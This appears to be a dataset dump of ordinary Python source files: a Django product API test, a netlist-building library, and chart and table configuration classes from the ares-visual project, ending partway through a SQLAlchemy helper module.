metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jealuna/Tienda",
"score": 2
}
|
#### File: tienda/productos/tests.py
```python
import json
from django.contrib.auth.models import User
from django.test import TestCase
from rest_framework.test import APITestCase, force_authenticate
from productos.models import producto
from productos.serializers import ProductoSerializer
class AlmacenTestCase(APITestCase):
def setUp(self):
self.username = 'john_doe'
self.password = '<PASSWORD>'
self.user = User.objects.create(username=self.username, password=self.password)
self.client.force_authenticate(user=self.user)
producto.objects.create(
SKU='N.ISE32RS', descripcion='Celular')
producto.objects.create(
SKU='N.J7NEOD', descripcion='Celular')
def test_get_lista(self):
response = self.client.get('/api/productos/', format='json')
productos = producto.objects.all()
serializer = ProductoSerializer(productos, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, 200)
```
#### File: tienda/utils/utils.py
```python
import pandas as pd
def lee_archivo(archivo):
df = pd.read_excel(archivo)
df.fillna(0, inplace = True)
return df
if __name__ == "__main__":
df = lee_archivo ('Orden de Compras.xlsx')
```
|
{
"source": "jeame/pyNetlist",
"score": 3
}
|
#### File: pyNetlist/pyNetlist/base.py
```python
class BaseObj(object):
'''Base class for devices and nets'''
name = None
def __init__(self, *args, **kwargs):
self.type = self.__class__
if self.name is None:
self.name = self.__class__.__name__
self.id = None
self.parseargs(*args, **kwargs)
self.post_init(*args, **kwargs)
def post_init(self, *args, **kwargs):
pass
def parseargs(self, *args, **kwargs):
pass
def get_ref(self):
if self.id is None:
id = ''
else:
id = str(self.id)
return self.name + id
@property
def ref(self):
return self.get_ref()
class BaseObjList(object):
'''Base class for lists of devices, ports, params...'''
def __init__(self, arr):
self.elements = arr
def __len__(self):
return self.elements.__len__()
def __iter__(self):
return self.elements.__iter__()
def __getitem__(self, val):
if isinstance(val, list):
return self.__class__([self[i] for i in val])
elif isinstance(val, (int, slice)):
return self.elements[val]
else:
raise TypeError('Unsupported index type: %s' % val.__class__.__name__)
class DeviceList(BaseObjList):
'''Contains an array of devices of a specific type'''
def __getattr__(self, port_id):
return PortList([d[port_id] for d in self.elements])
class PortList(BaseObjList):
pass
class ParamList(BaseObjList):
pass
class Device(BaseObj):
'''Device base class'''
ports = []
params = []
def parseargs(self, **kwargs):
self.ports = kwargs.pop('ports', self.ports)
self.params = kwargs.pop('params', self.params)
self.name = kwargs.get('name', self.name)
self._ports = [kwargs.get(id, Net()) for id in self.ports]
self._params = []
for id in self.params:
val = kwargs.get(id, None)
if isinstance(val, Param):
self._params.append(val)
else:
self._params.append(Param(val))
for i, port_id in enumerate(self.ports):
links = self._ports[i].links
if self not in links:
links[self] = [port_id]
elif port_id not in links[self]:
links[self].append(port_id)
def __getitem__(self, id):
if id in self.ports:
return self._ports[self.ports.index(id)]
elif id in self.params:
return self._params[self.params.index(id)]
else:
raise AttributeError('This port does not exist: %s' % id)
def __getattr__(self, id):
return self.__getitem__(id)
class Net(BaseObj):
def post_init(self, **kwargs):
self.name = kwargs.get('name', 'N')
self.globalnet = kwargs.get('globalnet', False)
self.links = {}
class Param(BaseObj):
def parseargs(self, value=None):
self.value = value
```
#### File: pyNetlist/pyNetlist/circuit.py
```python
from base import *
class Circuit(Device):
'''Container for the whole circuit'''
def parseargs(self, **kwargs):
for key,val in kwargs.items():
if isinstance(val, Net) and key not in self.ports:
self.ports.append(key)
if isinstance(val, Param) and key not in self.params:
self.params.append(key)
super(Circuit, self).parseargs(**kwargs)
def post_init(self, **kwargs):
self.devices = {}
self.nets = set()
self.parameters = set()
self.maxid = 0
self.maxid_nets = 0
self.maxid_params = 0
for p in self._params: #index parameters
self.add(p)
class Subcircuit(Device):
circuit = self
ports = self.ports
params = self.params
name = self.name
self.Instance = Subcircuit
def add(self, obj):
'''Add single device instances to the circuit'''
if obj.type is Circuit:
for n in obj.nets:
self.add(n)
for dgroup in obj.devices.values():
for d in dgroup:
self.add(d)
return obj
elif obj.type is Net:
if obj.globalnet == True:
return #ignore global nets
if obj not in self.nets:
obj.id = self.maxid_nets + 1
self.nets.add(obj)
self.maxid_nets = obj.id
return obj
elif obj.type is Param:
if obj not in self.parameters:
obj.id = self.maxid_params + 1
self.parameters.add(obj)
self.maxid_params = obj.id
return obj
else: #obj is device
if obj.type not in self.devices:
self.devices[obj.type] = set()
devlist = self.devices[obj.type]
if obj not in devlist:
for p in obj._ports + obj._params:
self.add(p)
obj.id = self.maxid + 1
devlist.add(obj)
self.maxid = obj.id
return obj
return False
def addArray(self, D, size=1, **kwargs):
'''Add an array of device instances of class D to the circuit
If dimensions match, ports are handled automatically'''
devices = []
for i in xrange(size):
kwargs_new = {}
for key,val in kwargs.items():
if isinstance(val, (PortList, ParamList)):
if len(val)==size:
kwargs_new[key] = val[i]
else:
raise ValueError('Dimension mismatch: %s.%s (%s, %s)' % (D.__name__, key, len(val), size))
else:
kwargs_new[key] = val
devices.append(self.addNode(D, **kwargs_new))
return DeviceList(devices)
def addNode(self, D, **kwargs):
return self.add(D(**kwargs))
```
|
{
"source": "jeamick/ares-visual",
"score": 2
}
|
#### File: configs/ChartJs/ChartJsBase.py
```python
import json
from ares.Lib.js import AresJsEncoder
class ChartJs(dict):
"""
"""
name, chartCall, jsCls = 'Default configuration', None, 'Chart'
listAttributes = ['yAxes', 'xAxes', 'datasets']
points = ['circle', 'triangle', 'rect', 'rectRounded', 'rectRot', 'cross', 'crossRot', 'star', 'line', 'dash']
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {
'options': {'maintainAspectRatio': False, 'responsive': True, 'legend': {'display': True},
'scales': {
'yAxes': [{
'ticks': {'display': True, 'beginAtZero': True}
}],
'xAxes': [{'ticks': {'display': True}}]}
}
}
def __init__(self, aresObj, data, seriesProperties):
self.aresObj, self.seriesProperties = aresObj, seriesProperties
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
self.update(resolvedAttrs)
self['type'] = json.dumps(self.chartObj)
self.data = self.transformation(data)
self.config()
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if isinstance(srcVals, tuple):
srcVals = json.dumps(srcVals[0]) if srcVals[1] else srcVals[0]
if srcKey is not None:
if isinstance(srcVals, str):
# TODO: To be tested in Python 3
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def config(self):
"""
:category: Chart Series Properties
:rubric: JS
:type: Configuration
:dsc:
Extra configuration function to change the data options. Those parameters will be used on the javascript part
when the final Javascript chart object will be passed to the charting library.
"""
pass
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if index is None:
for i in range(len(self.data._schema['values'])):
if len(cList) > i:
self.seriesProperties['dynamic'].setdefault(i, {})['backgroundColor'] = cList[i]
else:
self.seriesProperties['dynamic'].setdefault(index, {})['backgroundColor'] = cList
@classmethod
def transformation(cls, data):
"""
:category: Data Transformation
:rubric: PY
:type: Transformation
:dsc:
Data transformation for the DataFrame. Using this function might create a new DataFrame. Thus a new Javascript
object will be created and the logic within the global filters might not work correctly.
If you use this, please make it obvious to ensure other users might not be surprised
"""
return data
def addAttr(self, key, val, tree=None, category=None, isPyData=True):
if isPyData:
val = json.dumps(val, cls=AresJsEncoder.AresEncoder)
if tree is not None:
if not category in self:
self[category] = {}
chartLocation = self[category]
for subCategory in tree:
if isinstance(subCategory, tuple):
subCategory, subCategoryIndex = subCategory
else:
subCategory, subCategoryIndex = subCategory, 0
if subCategory in self.listAttributes:
if not subCategory in chartLocation:
chartLocation[subCategory] = []
for i in range(subCategoryIndex + 1):
chartLocation[subCategory].append({})
if len(chartLocation[subCategory]) < subCategoryIndex + 1:
for i in range(subCategoryIndex + 1):
if i not in chartLocation[subCategory]:
chartLocation[subCategory].append({})
chartLocation = chartLocation[subCategory][subCategoryIndex]
else:
if not subCategory in chartLocation:
chartLocation[subCategory] = {}
chartLocation = chartLocation[subCategory]
if isinstance(chartLocation, list):
chartLocation[0][key] = val
else:
chartLocation[key] = val
elif category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, tree=None, category=None):
""" """
chart = self
if tree is not None:
chartLocation = self.get(category, {})
for subCategory in tree:
chartLocation = chartLocation.get(subCategory, {})
chart = chartLocation
if category is not None:
chart = self.get(category, {})
for attr in keys:
if attr in chart:
del chart[attr]
def dataSetType(self, chartType, seriesId):
"""
"""
self.addAttr('type', chartType)
```
#### File: configs/DataTable/DataTableBase.py
```python
import json
class TableBasic(dict):
"""
:category: Datatable
:rubric: PY
:type: configuration
:dsc:
The base table used in the framework. This configuration is forced in the aresObj.table() call.
:example: aresObj.table([])
:example: aresObj.datatable('base', [] )
"""
name, tableCall = 'Table', 'base'
_attrs = {'stateSave': False, 'searching': False, 'paginate': False, 'pageLength': 30, 'autoWidth': False,
'colReorder': False, 'scrollX': False, 'scrollCollapse': False, 'dom': ('Bfrtip', True),
#'bInfo': False,
#'lengthMenu': [ [ 10, 25, 50, -1 ], [ '10 rows', '25 rows', '50 rows', 'Show all' ] ]
}
def __init__(self, aresObj, header, data, jsTableId):
self.update( {'buttons': [], 'columnDefs': [] } )
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
self.update(resolvedAttrs)
self.aresObj, self.header, self.data, self.jsTableId = aresObj, header, data, jsTableId
cellIdx, cellNames = [], []
for i, rec in enumerate(self.header):
if rec.get('format', '').startswith('CELL'):
cellIdx.append("td:eq(%s)" % i)
cellNames.append(rec['data'])
self.config()
self.aresObj.jsGlobal.fnc('EditableCell(e, tableObj)', '''
$(e).css( {'color': 'blue', 'font-weight': 'bold'}) ;
$(e).attr('contenteditable', true) ; $(e).focus() ; ''')
self.aresObj.jsGlobal.fnc('StopEditingCell(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data($(e).text()) ;
$(tableObj.cell(row, column).node()).css( {'color': 'blue', 'font-weight': 'bold'} ) ;
$(e).attr('contenteditable', false) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) { $(tableObj.cell(row, 3).node()).find('#save').show() ; }
''' % {'jsTableId': self.jsTableId})
self.aresObj.jsGlobal.fnc('UpdateCell(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data(e.value) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) {
var saveIndex = -1 ;
tableObj.settings().init().columns.forEach( function(rec, index) { if (rec.data == '_save') { saveIndex = index; } }) ;
if ( saveIndex != -1) { $(tableObj.cell(row, saveIndex).node()).find('#save').show() ; } }
''' % {'jsTableId': self.jsTableId})
self.aresObj.jsGlobal.fnc('UpdateCheckBox(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data(e.checked) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) { var saveIndex = -1 ;
tableObj.settings().init().columns.forEach( function(rec, index) { if (rec.data == '_save') { saveIndex = index; } }) ;
if ( saveIndex != -1) { $(tableObj.cell(row, saveIndex).node()).find('#save').show() ; } }
''' % {'jsTableId': self.jsTableId})
if cellNames:
if not 'createdRowParts' in self:
self['createdRowParts'] = []
for i, cellName in enumerate(cellNames):
self['createdRowParts'].append(
" if ( data['%(colName)s'].dsc != undefined ) { $('%(colIndex)s', row).attr( 'title', data['%(colName)s'].dsc ) } " % {
'colName': cellName, 'colIndex': cellIdx[i]})
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if isinstance(srcVals, tuple):
srcVals = json.dumps(srcVals[0]) if srcVals[1] else srcVals[0]
if srcKey is not None:
if isinstance(srcVals, str):
# TODO: To be tested in Python 3
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def resolveList(self, currDict, currList, listResult):
"""
"""
for item in currList:
if isinstance(item, dict):
subList = []
self.resolveDict(item, subList)
listResult.append("{ %s }" % (", ".join(subList)))
elif isinstance(item, list):
subList = []
self.resolveList(currDict, item, subList)
listResult.append("[%s]" % (",".join(subList)))
else:
listResult.append(item)
def resolveDict(self, currDict, listResult):
"""
"""
for key, item in currDict.items():
if isinstance(item, dict):
subList = []
self.resolveDict(item, subList)
listResult.append("%s: {%s}" % (key, ", ".join(subList)))
elif isinstance(item, list):
subList = []
self.resolveList(currDict, item, subList)
listResult.append("%s: [%s]" % (key, ",".join(subList)))
else:
listResult.append("%s: %s" % (key, item))
def getIndices(self, cols):
"""
"""
colIdx = []
for i, rec in enumerate(self.header):
if rec['data'] in cols:
colIdx.append(i)
return colIdx
def addAttr(self, key, val, category=None, isPyData=True):
"""
"""
if isPyData:
val = json.dumps(val)
if category is not None:
if isinstance(category, tuple):
category, index = category
self[category][index][key] = val
else:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, category=None):
"""
"""
chart = self.get(category, {}) if category is not None else self
for attr in keys:
if attr in chart:
del chart[attr]
def js(self):
"""
"""
ctx = []
if 'createdRowParts' in self:
self['createdRow'] = "function ( row, data, index ) { %s }" % ";".join(self['createdRowParts'])
del self['createdRowParts']
if getattr(self, 'footerType', None) == 'sum':
self['footerCallback'] = ''' function ( row, data, start, end, display ) {
var api = this.api();
api.columns('.sum', { page: 'current' } ).every(function (el) {
var sum = this.data().reduce(function (a, b) {var x = parseFloat(a) || 0; var y = parseFloat(b) || 0;return x + y; }, 0);
$(this.footer()).html( sum.formatMoney(0, ',', '.') ); } );}
'''
self.resolveDict(self, ctx)
return ctx
def config(self): pass
def ordering(self, orders):
"""
:category:
:rubric: JS
:type: Configuration
:dsc:
Set the default ordering rule in the datatable. By default the first column is used.
It is possible here to provide a list of column with the type of sorting rule to apply asc or desc.
:link Datatable Documentation: https://datatables.net/examples/basic_init/table_sorting.html
:example: tableObj.ordering(False)
"""
if not orders:
self['order'] = 'false'
else:
orderCols, orderTypes = [], []
for colName, orderType in orders:
orderCols.append(colName)
orderTypes.append(orderType)
orderColsIdx = self.getIndices(orderCols)
self['order'] = []
for i, j in enumerate(orderColsIdx):
self['order'].append('[%s, "%s"]' % (j, orderTypes[i]))
```
#### File: configs/NVD3/NVD3Base.py
```python
import json
class NVD3(dict):
name, chartObj, chartCall = 'Default Configuration', None, None
convertFnc, eventObject, seriesStyle = None, 'multibar', ''
_attrs = {} # Please do not change this object, it will impact everything as dictionaries are mutable objects
priorities = ['color', 'showValues', 'x', 'y', 'interpolate']
def __init__(self, aresObj, data, htmlId):
self.aresObj, self.chartId, self.axis = aresObj, htmlId, {}
self.data = self.transformation(data)
for key, pyVal in self._attrs.items():
(val, isPyData) = pyVal if isinstance(pyVal, tuple) else (pyVal, True)
self.addAttr(key, val, isPyData=isPyData)
self.config()
def config(self): pass
@classmethod
def transformation(cls, data):
return data
@property
def jsQueryData(self):
return '''{
event_index: event.data.x, event_name: event.data.key, event_label: event.data.label,
event_val: event.data.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
@property
def jsQueryData(self):
return "{'event_index': event.data.x, 'value': event.data.y, 'name': event.data.key, 'label': event.data.label}" % { 'htmlId': self.chartId}
def jsChartDef(self):
if self.chartObj is None:
raise Exception("Probleme in the class, chartObj should be defined")
return 'nv.models.%s()' % self.chartObj
def addAttr(self, key, val=None, category=None, isPyData=True):
if isinstance(key, dict):
for k, v in key.items():
if isPyData:
v = json.dumps(v)
if category is not None:
self.setdefault(category, {})[k] = v
else:
self[k] = v
else:
if isPyData:
val = json.dumps(val)
if category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, category=None):
chart = self.get(category, {}) if category is not None else self
for attr in keys:
if attr in chart:
del chart[attr]
def interpolate(self, val="basis"): self.addAttr('interpolate', val)
def style(self, seriesAttr=None, recAttr=None):
# style( {'C': {'shape': 'triangle-up'} }, {'data': 'label', 'attr': {'January': {'shape': 'triangle-up','color': 'red'} } })
self.seriesStyle = '''
values.forEach( function( rec ) {
var seriesAttr = %(seriesAttr)s; var recAttr = %(recAttr)s;
if( Object.keys(seriesAttr).length > 0) {
if( seriesAttr[rec.key] != undefined ) {
for (var k in seriesAttr[rec.key]) { rec[k] = seriesAttr[rec.key][k]} }};
if( Object.keys(recAttr).length > 0) {
if ((recAttr.data == 'key') && ( rec.key in recAttr.attr) ) {
rec.values.forEach( function(i) {
for (var k in recAttr.attr[rec.key]) { i[k] = recAttr.attr[rec.key][k] ; }
})
} else {
rec.values.forEach( function(i) {
if ( recAttr.attr[i[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[i[recAttr.data]]) { i[k] = recAttr.attr[i[recAttr.data]][k] ; }
}
})
}
}
}) ''' % {'seriesAttr': json.dumps({} if seriesAttr is None else seriesAttr),
'recAttr': json.dumps({} if recAttr is None else recAttr)}
def jsToTable(self):
""" Convert the date from the chart to a table """
return ''' '''
# return '''
# var tableData = {dom: 'Bfrtip', buttons: [
# {'extend': 'excelHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_excel'},
# {'extend': 'pdfHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_pdf'}],
# data: [], columns: [ {data: 'row', title: 'Series'} ], scrollY: "%(height)s", paging:false, searching:true, autoWidth:true };
# for (var j in values[0].values[0] ) { tableData.columns.push( {data: j, title: j } ) ; } ;
# values.forEach( function(rec, index) { rec.values.forEach( function(i) { i.row = rec.key ; tableData.data.push( i ) ; }) ; }) ;
# ''' % {'height': self.height, 'htmlId': self.chartId}
def toJs(self, options=None):
chart = dict([(key, val) for key, val in self.items() if val])
ctx = [] # Just to ensure that the Structure of the chart component will not be changed in the python layer
for attrOrder in self.priorities:
if attrOrder in chart:
if isinstance(chart[attrOrder], dict):
for subKey, subVal in chart[attrOrder].items():
ctx.append("%s.%s(%s)" % (attrOrder, subKey, subVal))
else:
ctx.append("%s(%s)" % (attrOrder, chart[attrOrder]))
del chart[attrOrder]
for key, val in chart.items():
if isinstance(val, dict):
for subKey, subVal in val.items():
ctx.append("%s.%s(%s)" % (key, subKey, subVal))
else:
ctx.append("%s(%s)" % (key, val))
axis = []
for key, vals in self.axis.items():
axis.append("%s.%s.%s" % ('%s_chart' % self.chartId, key, ".".join(["%s(%s)" % (subKey, val) for subKey, val in vals.items()])))
return '%s.%s;%s' % (self.jsChartDef(), ".".join(ctx), ";".join(axis))
```
#### File: configs/NVD3/NVD3Line.py
```python
import json
from ares.configs.NVD3 import NVD3Base
class NVD3Line(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall, eventObject = 'Lines', 'lineChart', 'line', 'interactiveLayer'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showYAxis': True, 'showXAxis': True, 'useInteractiveGuideline': True, 'showLegend': True, "legendPosition": True,
'x': ("function(d) { return d.x; }", False), 'y': ("function(d) { return d.y; }", False)
}
@property
def jsQueryData(self):
return '''{event_code: '%(htmlId)s'}''' % {'htmlId': self.chartId}
class NVD3SparkLine(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Spark Line (with Focus)', 'sparklinePlus', 'sparkline'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showLastValue': True}
def style(self, seriesAttr=None, recAttr=None):
self.seriesStyle = '''
values.forEach( function( rec ) {
var recAttr = %(recAttr)s;
if ( recAttr.attr[rec[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[rec[recAttr.data]]) { rec[k] = recAttr.attr[rec[recAttr.data]][k] ; }
}
}) ''' % {'recAttr': json.dumps({} if recAttr is None else recAttr)}
def jsToTable(self):
""" Convert the date from the chart to a table """
return '''
var tableData = {dom: 'Bfrtip', buttons: [
{'extend': 'excelHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_excel'},
{'extend': 'pdfHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_pdf'}],
data: [], columns: [], scrollY: "%(height)s", paging:false, searching:true, autoWidth:true };
console.log(values) ;
for (var j in values[0] ) { tableData.columns.push( {data: j, title: j } ) ; } ;
values.forEach( function(rec, index) { tableData.data.push( rec ); }) ;
''' % {'height': self.height, 'htmlId': self.chartId}
```
#### File: configs/NVD3/NVD3Multi.py
```python
import json
from ares.configs.NVD3 import NVD3Base
class NVD3MultiBar(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Multi Bars', 'multiBarChart', 'multi-bar'
_attrs = {'reduceXTicks': True, 'showControls': True, 'groupSpacing': 0.1, 'rotateLabels': -15, 'showLegend': True}
#def xAxisSort(self, htmlId):
# return "%(htmlId)s_data[0].values = %(htmlId)s_data[0].values.sort(keysrt('x', false)); ;" % {'htmlId': htmlId}
class NVD3MultiBarStacked(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Multi Bars', 'multiBarChart', 'multi-bar-stacked'
_attrs = {'reduceXTicks': True, 'showControls': True, 'groupSpacing': 0.1, 'rotateLabels': -15, 'showLegend': True, 'stacked': True}
def xAxisSort(self, htmlId):
return "%(htmlId)s_data[0].values = %(htmlId)s_data[0].values.sort(keysrt('x', false)); ;" % {'htmlId': htmlId}
class NVD3MultiChart(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'MultiCharts', 'multiChart', 'multi'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showLegend': False}
def style(self, seriesAttr=None, recAttr=None):
self.seriesStyle = '''
values.forEach( function( rec ) {
var seriesAttr = %(seriesAttr)s; var recAttr = %(recAttr)s;
if( Object.keys(seriesAttr).length > 0) {
if( seriesAttr[rec.key] != undefined ) {
if ( seriesAttr[rec.key].type == undefined) { rec.type = 'line';} else { rec.type = seriesAttr[rec.key].type } ;
if ( seriesAttr[rec.key].yAxis == undefined) { rec.yAxis = 1;} else { rec.yAxis = seriesAttr[rec.key].yAxis };
for (var k in seriesAttr[rec.key]) { rec[k] = seriesAttr[rec.key][k]} }
else { rec.type = 'line' ; rec.yAxis = 1; }}
else { rec.type = 'line' ; rec.yAxis = 1;}
if( Object.keys(recAttr).length > 0) {
if ((recAttr.data == 'key') && ( rec.key in recAttr.attr) ) {
rec.values.forEach( function(i) {
for (var k in recAttr.attr[rec.key]) { i[k] = recAttr.attr[rec.key][k] ; }
})
} else {
rec.values.forEach( function(i) {
if ( recAttr.attr[i[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[i[recAttr.data]]) { i[k] = recAttr.attr[i[recAttr.data]][k] ; }
}
})
}
}
}) ''' % {'seriesAttr': json.dumps({} if seriesAttr is None else seriesAttr), 'recAttr': json.dumps({} if recAttr is None else recAttr)}
class NVD3Scatter(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall, eventObject = 'Scatter', 'scatterChart', 'scatter', 'scatter'
shapes = ['thin-x', 'circle', 'cross', 'triangle-up', 'triangle-down', 'diamond', 'square']
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showDistX': True, 'showDistY': True, 'duration': 300}
@property
def jsQueryData(self):
return '''{
event_index: event.point.x, event_label: event.point.label,
event_val: event.point.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
class NVD3Area(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Stacked Area', 'stackedAreaChart', 'area'
eventObject = 'stacked'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'duration': 300, 'showLegend': True}
@property
def jsQueryData(self):
return '''{
event_index: event.point.x, event_label: event.point.label,
event_val: event.point.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
```
#### File: ares-visual/Lib/AresRun.py
```python
import os
import importlib
from ares.Lib import AresImports
ares_flask = AresImports.requires(name="flask", reason='Missing Package', install='flask', autoImport=True, sourceScript=__file__)
class Run(object):
"""
:category:
:rubric:
:type:
:dsc:
"""
__slots__ = ['mac_address', 'host_name', 'current_user', 'report_name', 'script_name', 'local_path', 'url_root',
'title', 'is_local', 'url']
def __init__(self, report_name, script_name, current_user, host_name, mac_address, url_root, title=None):
self.report_name, self.script_name = report_name, script_name
self.current_user, self.host_name = current_user, host_name
self.mac_address, self.url_root = mac_address, url_root
self.url = "#"
if report_name is not None:
mod = importlib.import_module('%s.__init__' % report_name)
self.local_path, _ = os.path.split(os.path.abspath(mod.__file__))
if script_name is not None and ares_flask is not None:
self.url = "%s/run/%s/%s" % (ares_flask.current_app.config['URLS']['ares-report'], self.report_name, self.script_name)
else:
self.local_path = None
self.title = "%s \ %s " % (self.report_name.upper(), self.script_name) if title is None else title
self.is_local = True if (ares_flask is None or ares_flask.request.url_root.startswith('http://127.0.0.1')) else False
```
#### File: ares-visual/Lib/AresSql.py
```python
import inspect
import ares.doc
import ares.utils.AresSiphash
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pandas = requires("pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
ares_sqlalchemy = requires("sqlalchemy", reason='Missing Package', install='sqlalchemy', autoImport=True, sourceScript=__file__)
# TODO: Use correctly requires with sqlalchemy module
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import importlib
import logging
import sys
import os
import datetime
import traceback
from ares.Lib import AresMarkDown
class SqlConn(object):
"""
:category: SQL Framework
:rubric: PY
:type: class
:dsc:
Base Class to create a database and perform SQL operations using the sqlalchemy interface
:link Documentation: https://www.pythonsheets.com/notes/python-sqlalchemy.html#join-joined-two-tables-via-join-statement
"""
_extPackages = None
def __init__(self, dbFamily, database=None, filename=None, modelPath=None, reset=False, migrate=True, **kwargs):
"""
:category: SQL Framework
:rubric: PY
:dsc:
Here we try to setup as generic as we can all the variable environment variables for the DB.
We try to not rely on the aresObj in order to be able to use this interface for various usage
"""
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
self.query = None # In this design we decided to go to a route where each user will manage his database and also the person who can look at the data
# This will simplify a lot the permissionning (we consider the storage not a problem at this stage as we split per user
# Also this could be interesting to check the user data use
# Some reports can get centralised databases using the module variable SINGLEDB
dbConfig = {'drivername': dbFamily, 'username': kwargs.get('username'), 'password': kwargs.get('password'), 'host': kwargs.get('host'),
'port': kwargs.get('port'), 'query': kwargs.get('query'), 'database': database}
self.dbPath = database
self.username = kwargs.get('username')
self.userhost = kwargs.get('userhost')
self.engine = sqlalchemy.create_engine(sqlalchemy.engine.url.URL(**dbConfig))
self.metadata = sqlalchemy.MetaData(bind=self.engine)
self.metadata.reflect()
self.metadata.create_all(self.engine)
self.session = sessionmaker(bind=self.engine)()
if modelPath:
self.loadSchema(filename=filename, modelPath=modelPath, reset=reset, migrate=migrate)
self.metadata.reflect()
def _loadSqlFile(self, fileName, reset, migrate):
"""
:param filePath:
:return:
"""
on_init_fnc = None
modelMod = importlib.import_module(fileName.replace('.py', ''))
for tableName, table in inspect.getmembers(modelMod):
if tableName == 'on_init':
on_init_fnc = table
elif '__' not in tableName and inspect.isroutine(table):
tableDef = getattr(modelMod, tableName)()
tableDef.append(sqlalchemy.Column('lst_mod_dt', sqlalchemy.DateTime, default=datetime.datetime.utcnow(), nullable=True))
if not self.engine.has_table(tableName):
newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
newTable.create(self.engine, checkfirst=True)
else:
# if migrate:
# oldTable = '__old_%s' % tableName
# self.cloneTable(tableName, oldTable, force=True)
# newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
# newTable.drop(self.engine, checkfirst=True)
# newTable.create(self.engine, checkfirst=True)
# self.migrateTable(oldTable, tableName)
# sqlalchemy.Table(oldTable, self.metadata).drop(self.engine)
if reset:
newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
newTable.drop(self.engine, checkfirst=True)
newTable.create(self.engine, checkfirst=True)
#We do the part where we run default that need to happen on database creation
if on_init_fnc:
on_init_fnc(self)
def help(self, category=None, rubric=None, type=None, value=None, enum=None, section=None, function=None, lang='eng', outType=None):
"""
:category: Python function
:rubric: PY
:dsc:
Display the Python documentation of the requested object.
This is done by reading all the documentation from the object.
Documentation is by default displayed in the Python console but it can be also written to a static html page.
It is possible to zoom in the documentation to get more details
:example: aresObj.help()
"""
import collections
outStream = AresMarkDown.DocCollection(self.aresObj)
countMissing = collections.defaultdict(int)
outStream.title("AReS Databases")
outStream.append('''
The database framework in AReS is fully based on [SqlAlchemy]( https://www.sqlalchemy.org ). This Python module is an abstraction layer on top of a database. It will allow you to create, change and trash tables very easily.
